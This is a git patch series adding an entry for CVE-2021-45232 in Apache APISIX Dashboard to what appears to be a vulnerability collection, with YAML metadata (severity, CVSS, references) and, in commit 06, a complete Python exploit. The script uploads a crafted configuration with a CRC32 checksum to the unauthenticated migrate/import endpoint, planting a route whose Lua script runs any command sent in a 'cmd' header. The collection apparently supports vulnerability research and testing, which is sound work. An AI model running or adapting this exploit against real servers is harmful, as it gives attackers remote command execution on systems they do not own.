From 1c3f65e64c3ffdb5300e10288109b4e5acd38ac9 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:48:32 +0000 Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Apache-APISIX?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/.keep diff --git a/cve/Apache-APISIX/.keep b/cve/Apache-APISIX/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5b1d51aa927a6ff2e5f264107a17a92688740651 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:49:00 +0000 Subject: [PATCH 02/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2021/.keep diff --git a/cve/Apache-APISIX/2021/.keep b/cve/Apache-APISIX/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2a2dd85ca3cbc4be4c9f02142b146cc44a86c530 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:49:15 +0000 Subject: [PATCH 03/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2021/yaml/.keep diff --git a/cve/Apache-APISIX/2021/yaml/.keep b/cve/Apache-APISIX/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d4775c8ab2a73f7027fd3b7dbb36cc804b7ff9df Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:49:48 +0000 Subject: [PATCH 04/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20cve-2021-45232?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/cve-2021-45232/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/.keep diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/.keep b/cve/Apache-APISIX/2021/cve-2021-45232/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e8d86ffecc98f4638445200d9aee3573558d4ac9 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:50:05 +0000 Subject: [PATCH 05/14] add cve/Apache-APISIX/2021/cve-2021-45232. Signed-off-by: visity --- cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md new file mode 100644 index 00000000..e69de29b -- Gitee From fe3b5ba42e3a54bae45baa90cef63cd830134ddc Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:50:39 +0000 Subject: [PATCH 06/14] add cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py. Signed-off-by: visity --- .../cve-2021-45232/apisix_dashboard_rce.py | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py new file mode 100644 index 00000000..edd12c9f --- /dev/null +++ b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + "/" + uri) + else: + print("attack error") \ No newline at end of file -- Gitee From ada69e03b977ac0bb06b7132f296b14b827a4c19 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 04:53:59 +0000 Subject: [PATCH 07/14] add cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml. Signed-off-by: visity --- .../2021/yaml/ cve-2021-45232.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml new file mode 100644 index 00000000..955d5ae9 --- /dev/null +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -0,0 +1,21 @@ +id: cve-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cnvd-id: None + kve-id: None + tags: \ No newline at end of file -- Gitee From 3c68f4e214711b5fcaf1bbd80ce11f57f3b38ecd Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:38:12 +0000 Subject: [PATCH 08/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/.keep diff --git a/cve/Apache-APISIX/.keep b/cve/Apache-APISIX/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6cbcd6b392fc003c90f70d0a5311a85a5de4a97f Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:43:05 +0000 Subject: [PATCH 09/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2021/.keep diff --git a/cve/Apache-APISIX/2021/.keep b/cve/Apache-APISIX/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From bdc2be4022df3d8b1946df94e64885b00091e15d Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:46:19 +0000 Subject: [PATCH 10/14] update cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml. Signed-off-by: visity --- cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml index 955d5ae9..a43a8a89 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -1,12 +1,12 @@ -id: cve-2021-45232 +id: CVE-2021-45232 source: https://github.com/wuppp/cve-2021-45232-exp info: name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 severity: CRITICAL description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 scope-of-influence: - + In Apache APISIX Dashboard before 2.10.1 reference: - http://www.openwall.com/lists/oss-security/2021/12/27/1 - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 @@ -16,6 +16,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45232 + cwe-id: CWE-306 cnvd-id: None kve-id: None tags: \ No newline at end of file -- Gitee From 015f04d4a923409f9f4695a6fab76903350e1077 Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:46:28 +0000 Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2021/yaml/.keep diff --git a/cve/Apache-APISIX/2021/yaml/.keep b/cve/Apache-APISIX/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 251252ef99b0b2d00cbe1a0a372460f22e446abf Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:46:47 +0000 Subject: [PATCH 12/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/cve-2021-45232/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/cve-2021-45232/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/.keep diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/.keep b/cve/Apache-APISIX/2021/cve-2021-45232/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 626713ede7790b24a17dbee6bf1f0b94bbe560a6 Mon Sep 17 00:00:00 2001 From: visity Date: Thu, 23 Mar 2023 02:47:45 +0000 Subject: [PATCH 13/14] update cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml. Signed-off-by: visity --- cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml index a43a8a89..ad102017 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-306 cnvd-id: None kve-id: None - tags: \ No newline at end of file + tags: cve2021 \ No newline at end of file -- Gitee From 9533f22f32701e386f79612914e0c61fcdab70f0 Mon Sep 17 00:00:00 2001 From: visity Date: Thu, 23 Mar 2023 02:49:40 +0000 Subject: [PATCH 14/14] update openkylin_list.yaml. Signed-off-by: visity --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 83d154a9..bde273b1 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -6,6 +6,7 @@ cve: - CVE-2021-42013 apache-APISIX: - CVE-2022-24112 + - CVE-2021-45232 apache-activemq: - CVE-2020-13932 apache-CouchDB: -- Gitee